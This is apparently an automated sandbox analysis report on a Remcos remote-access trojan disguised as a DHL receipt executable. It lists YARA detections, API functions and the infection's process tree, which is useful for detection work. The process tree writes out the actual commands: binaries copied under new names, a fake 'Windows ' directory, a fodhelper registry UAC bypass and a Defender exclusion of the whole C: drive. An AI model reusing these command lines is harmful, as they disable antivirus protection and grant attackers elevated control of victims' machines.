              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044B04020_2_0044B040
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0043610D20_2_0043610D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044731020_2_00447310
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044A49020_2_0044A490
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0040755A20_2_0040755A
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0043C56020_2_0043C560
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044B61020_2_0044B610
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044D6C020_2_0044D6C0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_004476F020_2_004476F0
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044B87020_2_0044B870
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044081D20_2_0044081D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0041495720_2_00414957
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_004079EE20_2_004079EE
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00407AEB20_2_00407AEB
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044AA8020_2_0044AA80
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00412AA920_2_00412AA9
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00404B7420_2_00404B74
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00404B0320_2_00404B03
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_0044BBD820_2_0044BBD8
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00404BE520_2_00404BE5
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00404C7620_2_00404C76
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00415CFE20_2_00415CFE
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00416D7220_2_00416D72
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00446D3020_2_00446D30
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00446D8B20_2_00446D8B
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 20_2_00406E8F20_2_00406E8F
              Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\yfkwifxL.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 2DA42093 appears 50 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 028B7CC8 appears 49 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 028A480C appears 865 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 028A6650 appears 37 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 2DA41E65 appears 35 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 028B7E14 appears 45 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 028A46A4 appears 242 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 2DA74E10 appears 54 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 2DA74770 appears 41 times
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: String function: 028A44AC appears 69 times
              Source: C:\Users\Public\alpha.exeCode function: String function: 00007FF7689C3448 appears 54 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 028E6650 appears 37 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 2D5D4E10 appears 54 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 004165FF appears 35 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 028E46A4 appears 152 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 028E480C appears 606 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 028F7CC8 appears 43 times
              Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 00416760 appears 69 times
              Source: C:\Users\Public\ger.exeCode function: String function: 00007FF6DF31D3D0 appears 56 times
              Source: DHL119040 receipt document,pdf.exeBinary or memory string: OriginalFilename vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1801950205.000000007FBA0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1734723673.0000000002326000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1764092562.000000002C470000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000003.1719180719.000000002D4A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs DHL119040 receipt document,pdf.exe
              Source: DHL119040 receipt document,pdf.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000005.00000002.4144126485.000000002D60B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000002C.00000002.2045539948.000000003357B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000029.00000002.1972241496.0000000033A1B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@69/31@6/5
              Source: C:\Users\Public\alpha.exeCode function: 7_2_00007FF7689B32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError,7_2_00007FF7689B32B0
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA57952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_2DA57952
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 5_2_2D5B7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_2D5B7952
              Source: C:\Users\Public\ger.exeCode function: 19_2_00007FF6DF313F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,19_2_00007FF6DF313F5C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A7F6A GetDiskFreeSpaceA,0_2_028A7F6A
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA4F8FD CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,0_2_2DA4F8FD
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028B6D60 CoCreateInstance,0_2_028B6D60
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,0_2_2DA5B4A8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_2DA5AC78
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile created: C:\Users\Public\Libraries\PNOJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
              Source: C:\Users\Public\xkn.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
              Source: C:\ProgramData\Remcos\remcos.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
              Source: C:\Users\Public\Libraries\yfkwifxL.pifFile created: C:\Users\user\AppData\Local\Temp\971D.tmpJump to behavior
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
              Source: C:\ProgramData\Remcos\remcos.exeSystem information queried: HandleInformation
              Source: C:\Windows\System32\extrac32.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
              Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "SystemSettings.exe")
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 00000015.00000002.1816729060.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: remcos.exe, 00000014.00000002.1859873627.000000000270A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: remcos.exe, remcos.exe, 00000014.00000002.1857355239.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: DHL119040 receipt document,pdf.exeVirustotal: Detection: 18%
              Source: DHL119040 receipt document,pdf.exeString found in binary or memory: -StartForward
              Source: DHL119040 receipt document,pdf.exeString found in binary or memory: -address family not supported
              Source: remcos.exeString found in binary or memory: _-address family not supported
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeFile read: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe "C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe"
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\Users\Public\Libraries\yfkwifxL.pif C:\Users\Public\Libraries\yfkwifxL.pif
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe C:\\Users\\Public\\Libraries\\Lxfiwkfy.PIF
              Source: C:\Users\Public\Libraries\yfkwifxL.pifProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\971D.tmp\971E.tmp\971F.bat C:\Users\Public\Libraries\yfkwifxL.pif"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: unknownProcess created: C:\Windows\System32\SystemSettingsAdminFlows.exe "C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
